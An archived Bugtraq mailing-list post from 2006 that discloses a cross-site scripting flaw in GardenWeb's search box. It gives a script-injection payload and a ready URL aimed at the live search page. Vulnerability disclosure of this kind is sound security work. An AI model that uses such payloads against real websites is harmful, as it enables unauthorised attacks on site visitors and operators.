[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS in GardenWeb

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in GardenWeb
From: nanoymaster@xxxxxxxxx
Date: 12 Jun 2006 20:46:54 -0000

use the searchbox with

"><script>alert('XSS')</script>

eg url:
http://search.gardenweb.com/search/nph-ind.cgi?term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

Prev by Date: Cline Communications Sql injection
Next by Date: Apnaspace.com - XSS with cookie disclosure
Previous by thread: Cline Communications Sql injection
Next by thread: Apnaspace.com - XSS with cookie disclosure
Index(es):
- Date
- Thread